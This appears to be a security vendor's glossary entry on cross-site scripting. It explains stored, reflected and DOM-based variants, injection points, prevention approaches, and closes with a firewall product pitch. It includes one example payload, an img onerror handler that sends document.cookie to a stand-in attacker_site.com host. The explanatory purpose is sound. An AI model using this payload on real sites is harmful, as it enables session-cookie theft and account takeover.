Glossary

Cross Site Scripting (XSS)

What is Cross Site Scripting?

Cross-Site Scripting (XSS) is a pervasive web vulnerability, which enables an attacker to inject malicious JavaScript or other client-side code (e.g. VBScript, ActiveX, Flash, etc.) into web pages. The code is then executed in the client’s web browser.

By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker exploits a vulnerability within a website or web application that the victim visits, essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser.

Cross Site Scripting attacks fall into three categories: Persistent/Stored XSS, Reflected XSS and DOM-based XSS.

  • Persistent XSS attacks: these store malicious script on the web application server. Any user accessing the application becomes vulnerable to the script executing in their browser.
  • Reflected XSS attacks: these find a way to make a compromised server “echo back” a malicious script it receives in a request. An application which receives user input in a request and renders it to a response without proper validation to filter, or sanitize, the inputs could propagate malicious JavaScript. If a malicious script ends up in a response, it may execute in the browser context.
  • DOM-based XSS attacks: when no script is injected into a webpage – instead, an existing script’s behavior is changed in unintended ways. Typically the change is accomplished by changing a trusted DOM element.

Client side scripts have complete access to the DOM, and can access or modify any part thereof, including session data, cookies, accessing previous browsing history, and so on. For example, an attacker who succeeds in exploiting XSS vulnerabilities can hijack session data of an authenticated user. This allows an attacker to change a user password, thus gaining access to the victim’s account/system.

XSS attacks can even allow the whole client system to be controlled by an attacker. Malicious scripts can silently redirect client browsers to attacker controlled domains serving malware, such as browser exploit kits.

XSS Methods

XSS injection is possible through any part of a request that is not properly sanitized before being incorporated into a subsequent response. Typical targets include:

  • URL Parameters
  • FORM Parameters (GET and POST parameters)
  • Cookies
  • HTTP Headers
  • HTTP Referrer Objects

XSS Example Attack

An example of a XSS attack, where an attacker creates an account in a social networking site, is a good way to show the ease with which a system can be compromised without much effort. Using malicious JavaScript embedded in a form field, the code is submitted to the site and saved server side:

/profileUpdate/profileid20?firstName=John&lastName=peter&address=<img+src=ImageNotFound.gif+onerror=window.open('http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)>&gender=male

The attacker has now injected the code

(<img+src=ImageNotFound.gif+onerror=window.open('http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)>)

into the address field. If an innocent user views the attacker’s profile, the server sends the details of the attacker’s profile to the user’s browser in the response. The response contains the malicious JavaScript which executes in the browser and sends the session cookie to the attacker.

Preventing Cross-Site Scripting

Preventing cross-site scripting is difficult. There are a few approaches that are widely used:

  • Accepting only plain-text input where possible. This is often effective, though there are many cases where users may want to add limited HTML markup to their input – for example, for formatting purposes.
  • HTML entity encoding on significant characters – e.g. turning “<” into “& lt;” – is widely recommend and practiced, but may not prevent all scripting attacks.
  • Automated tools exist that will search for and remove malicious code that could be displayed to users. While this is the most comprehensive solution, these tools are unlikely to be totally effective against a determined attacker, and can be expensive to install and maintain.

Why Cross Site Scripting is Important

If an attacker can abuse a XSS vulnerability on a web page to execute arbitrary JavaScript in a visitor’s browser, the security of that website or web application and its users has been compromised.

Ideally, Cross-Site Scripting attacks can be prevented through secure coding that enforces proper input validation; however this is often impractical for legacy or third party applications, or when source code is not directly available. Disabling client side scripts in user browsers is sometimes suggested as an option, however most modern applications rely on client side scripts to operate normally, so disabling JavaScript leads malfunctioning web applications. Other emerging client-side security technologies, including Mozilla's Content Security Policy or IE XSS Filter, show future promise but are not yet foolproof.

Learn More About Cross Site Scripting

Related Terms

Further Reading

How Barracuda Can Help

The Barracuda Web Application Firewall contains comprehensive rule sets to detect plain or obfuscated XSS attacks in incoming requests. The default security policy prevents all XSS attacks without requiring any additional configuration or changes to web application code.

Barracuda CloudGen Firewalls include an Intrusion Detection and Prevention System which greatly enhances network security. By reinforcing comprehensive CloudGen network protection, this system helps prevent attacks such as Cross-Site Scripting and buffer overflows.